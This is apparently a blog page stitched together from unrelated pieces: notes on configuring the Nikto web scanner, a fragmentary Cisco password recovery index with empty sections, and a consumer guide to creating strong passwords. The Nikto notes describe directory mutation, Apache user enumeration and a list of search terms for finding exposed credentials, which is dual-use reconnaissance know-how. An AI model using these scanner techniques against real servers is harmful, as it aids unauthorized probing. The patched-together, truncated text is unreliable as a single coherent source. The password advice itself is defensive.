MUTATEDIRS=/....../ /members/ /porn/ /restricted/ /xxx/
MUTATEFILES=xxx.htm xxx.html porn.htm porn.html
GOOGLERS=password passwd login

The CGIDIRS setting contains a space-delimited list of directories. Nikto tries to determine whether each directory exists before trying to find files within it, although the –allcgi option overrides this behavior.

The CLIOPTS setting contains command-line options to include every time nikto runs, which is useful for shortening the command line by placing the –generic, –verbose, and –web options here.

NMAP and SKIPPORTS control nikto’s port-scanning behavior (-findports). If the nmap binary is not provided (which is usually the case for Windows systems), nikto uses Perl functions to port scan. The SKIPPORTS setting contains a space-delimited list of port numbers never to scan.

Use the PROXY* settings to enable proxy support for nikto.

Although there is rarely a need to change the DEFAULTHTTPVER setting, you may find servers that support only version 1.0.

The PLUGINDIR setting points to the directory for default and user-defined plug-ins (equivalent to whisker scan.db files). By default, nikto looks for the /plugins subdirectory in the location from which it is executed.

The MUTATE* settings greatly increase the time it takes to scan a server with the –mutate option. MUTATEDIRS instructs nikto to run every check from the base directory or directories listed here. This is useful for web sites that use internationalization, whereby the /scripts directory becomes the /1033/scripts directory. The MUTATEFILES settings instructs nikto to run a check for each file against every directory in its current plug-in. Note that there are two mutate techniques, -mutate-3 and –mutate4, that ignore these values. Technique 3 performs user enumeration against Apache servers by requesting /~user directories, which takes advantage of incorrectly configured public_html (UserDir module) settings in the httpd.conf file. Technique 4 is similar, but it uses the /cgi-bin/cgiwrap/~ method.

The GOOGLERS setting provides some fun Google searches for finding sensitive information. This technique is better accomplished with a browser and slightly more sophisticated searches. It serves more a role of curiosity in nikto as opposed to important functionality.


Introduction




This page is an index of password recovery procedures for Cisco products. For security reasons, the password recovery procedures listed here require physical access to the equipment.



Note: Cisco has announced the end of sale for the Cisco LocalDirector. Refer to the LocalDirector 400 Series. End−of−Life and End−of−Sale Notices and Product Bulletins for more information.



Prerequisites

Requirements


There are no specific requirements for this document.



Components Used

This document is not restricted to specific software and hardware versions



Conventions

Refer to Cisco Technical Tips Conventions for more information on document conventions.

















Create Strong Passwords

Examples of Threats:

  • When a password is stolen, a thief or hacker can easily access your private information and use your account.

  • Using the "remember password" function on your computer makes you vulnerable, especially if your laptop is stolen.

Our Tips:

  • Create strong passwords that use random combinations of uppercase and lowercase letters, numbers, and characters.

  • Use different passwords for each account.

  • Change your passwords every six months or so.

  • Do not use the remember password function on your Internet browser or other software programs.


Just about every account you access with your computer requires a password. In fact, you probably have to enter a password just to access your computer. Through the course of a day using your computer, you will likely access several programs or websites requiring a password. If you pay bills online, you will likely have dozens of accounts, each requiring a password. Here are some of the most common applications with password protection:

  • Logging in to your computer (Windows login)

  • Websites requiring a login account

  • E-mail accounts

  • Instant messaging services

  • Shared network files and directories

  • Broadband Internet account

  • Administrator access to your home network router

  • Wireless network encryption key (for example, WEP or WPA)

Because of the volume of passwords needed, most people create passwords that are easy for them to remember. The problem is that your password is the last line of defense protecting your personal and financial information. Chances are that your passwords are weak, meaning they are easy to crackand we mean really easy. In this chapter, we explain the difference between weak and strong passwords, and we show you how to create strong passwords that are both hard for others to crack and yet easy for you to remember.

Anatomy of a Lousy Password

Before we get started on how to create a hard-to-crack password, let's look at the type of weak passwords that are overused and easy to break. How easy you ask? Well, there is a free and easy-to-obtain program called Crack that can be used to systematically attempt to guess your password, trying out millions of passwords in a matter of hours through the use of an internal dictionary. This dictionary checks against every known word, in just about every language, with all standard manipulations, including character replacements, common misspellings, and letter reorderings. It also checks against names in every language (including the Chinese phone book). If that were not bad enough, it also checks against common character patterns, fictional characters and places, and every real place in the galaxy that has a name. In addition it also checks every date in every format. In other words, if it is a person, a time, an event, a place, a thing, or even a thing's place, or a person's thing, it is a bad idea to use it as a password.

Hackers use programs such as this to conduct what are known as brute-force password attacks, meaning they use a program to keep trying password after password until they get a hit. Weak passwords make it much easier for such attacks.


password

This is not clever. Do not use any known words, especially this one.

wordpass

Also not clever and easily cracked because it is made up of common words.

drowssap

Crack (and other programs like it) checks for words written in reverse.

Pa$$word

Crack (and other programs like it) checks for character replacements.

passwurd

Crack (and other programs like it) checks for misspellings, phonetic or otherwise.

Password49

Adding numbers to the end of a word does not make a password harder to crack.

123password

Prefixing words with numbers does not make a password harder to crack.

wachtwoord

Using Dutch (or any other known language, including Klingon and Hobbit) does not help. Crack checks them all.

12345

This is just something an idiot would use on their luggage.

lkjhgf

This is a consecutive string of keyboard characters that is easy to crack.

14159265

Any nonsequential, but algorithmic pattern is easily cracked. (This is the first eight digits of pi to the right of the decimal point.)

abbcccdddd

Any repeating pattern is easily cracked.

mrsmee

Crack (and other programs like it) checks for literary characters.

lordnelson

Crack (and other programs like it) checks for real people and historical figures.

1600pennave

Do not use real addresses. Crack (and other programs like it) checks for them.

22 BakerSt

Crack (and other programs like it) checks for fake addresses, too.

Raleigh

Do not use real places. Crack (and other programs like it) checks for them.

munchkinland

Crack (and other programs like it) checks for made up places, too.


No password. Although this may be convenient for Windows login, it is ill advised.



These are just a few examples of weak and easily cracked passwords. In general, if you use something familiar to you, Crack and other programs like it will figure it out. Also, you should never use personal information such as dates, login names, Social Security numbers, or any other number associated with you for your password.

Now that we have probably convinced you to change all your passwords, let's look at what it takes for a password to be considered strong.


Elements of a Strong Password

In a few words, a strong password is a random bunch of letters, numbers, and characters, usually eight or more digits long. The eight-character thing is really about the math and not a hard-and-fast rule. In fact, the more digits, the better, but only if the password is truly random. Let's look briefly at why random passwords are so hard for Crack to break.

Assume for a moment that you have a completely random password, one that cannot be found in even the most complete cracking dictionary on Earth. In this case, the only way to crack the password is the brute-force method of checking against all possible character combinations. The best defense against this method is to stack the odds in your favor so that it comes close to mathematically impossible to guess the password.

Here is how that is done. To start with, we have a lot of characters to work with:

  • There are 26 letters in the English alphabet (az).

  • All can be capitalized (AZ) or lowercase (az).

  • There are 10 numeric digits (09).

  • There are roughly 30 other special characters on a standard keyboard (!, <, @, >, ?, and so on). Not all are accepted by password-checking tools, so let's say about 15 of the 30 are.

If you create a truly random pattern of letters, numbers, and characters, there are about 77 possibilities for each digit in the password. If you use 8 characters, you raise that number to the power of 8, which gives you 1,235,736,291,547,681 combinations. It would take an awful lot of computing power (and several years) to try all the combinations that would eventually result in the right answer. To make it even harder on any would-be crackers, in addition to using a strong password you should change passwords periodically (we discuss how often a little later).

How to Create a Strong Password That You Can Remember

So here you are, knowing that you need a strong password, but how are you supposed to remember *Dsq#}3frP and 17 other uniquely random passwords for all your various accounts?

The answer is that you can use some personal information that will be easy for you to remember but difficult for others to guess. Here is how:


Start with a sentence about you or your family. For example : -

My sister Joanne is four years older than my brother Matt

Take the first letter of each word. If you have a number in your sentence use the number. The base password is now:

msji4yotmbm

Make case substitutions. With this sentence, we could use the grammatical capitalization for the password, giving us:

MsJi4yotmbM

Make character substitutions. Finally, look for opportunities to use other characters that will still be easy to remember, such as $ for s. Our final password looks like this:

"M$J!4y0tmbM"

Additional Password Tips

Here are some additional tips and considerations for passwords:

  • Do not reuse passwords. If at all possible, try to use a unique password for each of your accounts. If you only have one or two password-protected accounts, this should not be too hard. If you have several, however, it might be difficult to remember them all, even with the technique covered earlier. Consider writing them down in a safe place (but see the next tip).

  • Do not write your passwords down unless you can keep them safe. Most password advice says that you should never write down a password. We think this is a good guideline, but quite frankly most of us have 20 or more accounts. It is better to have a unique password for each account and to write them down somewhere, rather than creating a single password that you use on all your accounts. Here's the trick though: If you write down your passwords, keep them secured in a locked cabinet or safe. In your desk drawer or taped under your keyboard are all bad places for a written list of passwords. In a wallet, purse, or backpack is even worse. There are also programs such as Password Corral that allow you to store all of your passwords in a password-protected file on your PC. This way you only need to commit one password to memory. You can also write down the sentence if you used the method in the example earlier (My sister Joanne …); just remember your conversion rules and you can easily re-obtain your password.

  • Avoid using your passwords on public computers. Even if the remember-password function is turned off, there could be a keystroke logger or other hacking tool that someone has installed. Anything you type could be collected and used against you.

  • Never enable the remember-password option in Windows or Internet browsers. Even if you are using a computer that no one else uses, do not use this option. (This should be doubly obvious if you are using a shared computer.) Having this option turned on may be convenient, but if you ever lose your laptop (or if it is stolen), someone can easily check all the sites recently visited with your browser and get easy access to all your private information.

  • Never share your password with anyone. If you do, change it right away.

  • Never send your password in an e-mail. This is especially the case if you receive an e-mail asking for your account information even if the e-mail looks legitimate

  • Change your password periodically. Some experts advocate changing your passwords every three months. For most accounts, this is a bit much, especially if you create strong passwords such as the one shown earlier. A more realistic period is every six months or so. Never go more than a year with any password, and just so you know, rotating passwords among different accounts does not count as changing a password. Use the technique presented earlier and start from scratch. If you think you have been hacked, change all your passwords immediately.


Summary

Most people do not take their passwords seriously enough, opting for something convenient rather than actually protecting their personal information. Do not make this mistake. A good password is your first and sometimes only defense against hackers and identity thieves. You should not use your spouse's name (or any other weak password) no more than you should attempt to lock a safe full of your valuables using a bread tie. Neither of these will stop someone from getting in and taking your stuff

Promote my blog from
Technology Visit blogadda.com to discover Indian blogs Top Blogs
blogarama - the blog directory blog directory Blogs lists and reviews Blog Ratings Show off your blog
My Zimbio Webfeed (RSS/ATOM/RDF) submitted to http://www.feeds4all.nl TopOfBlogs GoLedy.com Best Indian websites ranking Technology (Gadgets) - TOP.ORG
Free Blog Directory Internet blogs Webfeed (RSS/ATOM/RDF) submitted to http://www.feeds4all.nl